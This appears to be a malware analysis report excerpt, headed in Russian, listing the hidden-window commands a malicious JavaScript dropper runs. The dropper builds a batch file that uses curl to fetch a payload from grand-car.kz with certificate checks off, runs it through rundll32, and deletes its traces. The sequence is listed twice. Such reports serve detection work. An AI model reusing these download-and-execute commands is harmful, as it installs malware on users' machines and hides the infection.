Техническая информация
- %TEMP%\et.u.bat
- '<SYSTEM32>\cmd.exe' /c del "<PATH_SAMPLE>.js"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c echo|set /p="cu" > "%TEMP%\et.u.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c echo rl "https://grand-car.kz/FJD/?a=3.16.52" --output "%TEMP%\\tenetur.z" --ssl-no-revoke --insecure --location >> "%TEMP%\et.u.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\et.u.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del "%TEMP%\et.u.bat"' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' "%TEMP%\\tenetur.z" scab /k house324' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del "<PATH_SAMPLE>.js"
- '<SYSTEM32>\cmd.exe' /c echo|set /p="cu" > "%TEMP%\et.u.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="cu" 1>"%TEMP%\et.u.bat""
- '<SYSTEM32>\cmd.exe' /c echo rl "https://grand-car.kz/FJD/?a=3.16.52" --output "%TEMP%\\tenetur.z" --ssl-no-revoke --insecure --location >> "%TEMP%\et.u.bat"
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\et.u.bat"
- '<SYSTEM32>\cmd.exe' /c del "%TEMP%\et.u.bat"
- '<SYSTEM32>\rundll32.exe' "%TEMP%\\tenetur.z" scab /k house324